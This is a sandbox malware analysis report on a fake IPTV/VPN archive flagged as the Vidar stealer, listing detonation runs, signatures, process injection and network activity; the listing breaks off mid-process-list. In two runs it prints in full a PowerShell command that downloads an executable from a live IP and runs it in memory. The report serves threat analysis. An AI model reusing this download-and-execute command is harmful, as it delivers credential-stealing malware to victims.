Malware Analysis Report

2025-03-14 21:49

Sample ID 250122-bb5m9azrem
Target IPTVPlayerTOP+AtlasVPN.rar
SHA256 3e6a57b6588c5f28123ac53555fb31aa7cd1952762ce0ec0723265cda6cc7ebd
Tags
execution vidar fc0stn google discovery phishing stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3e6a57b6588c5f28123ac53555fb31aa7cd1952762ce0ec0723265cda6cc7ebd

Threat Level: Known bad

The file IPTVPlayerTOP+AtlasVPN.rar was found to be: Known bad.

Malicious Activity Summary

execution vidar fc0stn google discovery phishing stealer

Detected google phishing page

Vidar

Vidar family

Blocklisted process makes network request

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Suspicious use of SetThreadContext

Browser Information Discovery

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Opens file in notepad (likely ransom note)

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-01-22 00:59

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:01

Platform

win7-20240903-en

Max time kernel

22s

Max time network

16s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\IPTVPlayerTOP+AtlasVPN.rar"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\IPTVPlayerTOP+AtlasVPN.rar"

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:01

Platform

win7-20240903-en

Max time kernel

15s

Max time network

17s

Command Line

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Description.txt

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Description.txt

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:01

Platform

win10v2004-20241007-en

Max time kernel

61s

Max time network

65s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Setup.rar"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Setup.rar"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 24.125.209.23.in-addr.arpa udp
US 8.8.8.8:53 167.173.78.104.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 86.49.80.91.in-addr.arpa udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:01

Platform

win7-20240903-en

Max time kernel

16s

Max time network

16s

Command Line

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Setup\DAC\bin\Redist_DACFramework.txt

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Setup\DAC\bin\Redist_DACFramework.txt

Network

N/A

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:01

Platform

win7-20240729-en

Max time kernel

91s

Max time network

16s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Setup\License Terms\License_SQLNCLI_ENU.txt"

Signatures

N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Setup\License Terms\License_SQLNCLI_ENU.txt"

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:01

Platform

win10v2004-20241007-en

Max time kernel

63s

Max time network

69s

Command Line

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Description.txt

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Description.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 5.114.82.104.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.49.80.91.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:01

Platform

win7-20241010-en

Max time kernel

67s

Max time network

19s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Setup.rar"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Setup.rar"

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:01

Platform

win7-20240903-en

Max time kernel

15s

Max time network

16s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Setup\Client SDK\ODBC\170\License Terms\License_msodbcsql_ENU.txt"

Signatures

N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Setup\Client SDK\ODBC\170\License Terms\License_msodbcsql_ENU.txt"

Network

N/A

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:01

Platform

win7-20240903-en

Max time kernel

92s

Max time network

17s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Setup\Setup-install.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2228 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Setup\Setup-install.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$url = 'http://147.45.44.131/infopage/rwtvha.exe'; $webClient = New-Object System.Net.WebClient; $headerName = 'X-Special-Header'; $headerValue = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'; $webClient.Headers.Add($headerName, $headerValue); $fileBytes = $webClient.DownloadData($url); $assembly = [System.Reflection.Assembly]::Load($fileBytes); $entryPoint = $assembly.EntryPoint; if ($entryPoint -ne $null) { $entryPoint.Invoke($null, @()); }"

Network

Country Destination Domain Proto
CH 147.45.44.131:80 147.45.44.131 tcp

Files

memory/2776-4-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp

memory/2776-5-0x000000001B680000-0x000000001B962000-memory.dmp

memory/2776-6-0x0000000002390000-0x0000000002398000-memory.dmp

memory/2776-7-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

memory/2776-8-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

memory/2776-9-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

memory/2776-10-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

memory/2776-11-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

memory/2776-12-0x0000000002A70000-0x0000000002A7E000-memory.dmp

memory/2776-13-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2025-01-22 00:59

Reported

2025-01-22 01:02

Platform

win10v2004-20241007-en

Max time kernel

135s

Max time network

136s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Setup\Setup-install.bat"

Signatures

Detected google phishing page

phishing google

Vidar

stealer vidar

Vidar family

vidar

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4460 set thread context of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3372 wrote to memory of 4460 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3372 wrote to memory of 4460 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4460 wrote to memory of 4640 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4460 wrote to memory of 4640 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4640 wrote to memory of 5108 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4640 wrote to memory of 5108 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4460 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3340 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 4320 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 640 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 640 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 3040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 3040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3340 wrote to memory of 3040 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Setup\Setup-install.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$url = 'http://147.45.44.131/infopage/rwtvha.exe'; $webClient = New-Object System.Net.WebClient; $headerName = 'X-Special-Header'; $headerValue = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'; $webClient.Headers.Add($headerName, $headerValue); $fileBytes = $webClient.DownloadData($url); $assembly = [System.Reflection.Assembly]::Load($fileBytes); $entryPoint = $assembly.EntryPoint; if ($entryPoint -ne $null) { $entryPoint.Invoke($null, @()); }"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\noth44de\noth44de.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

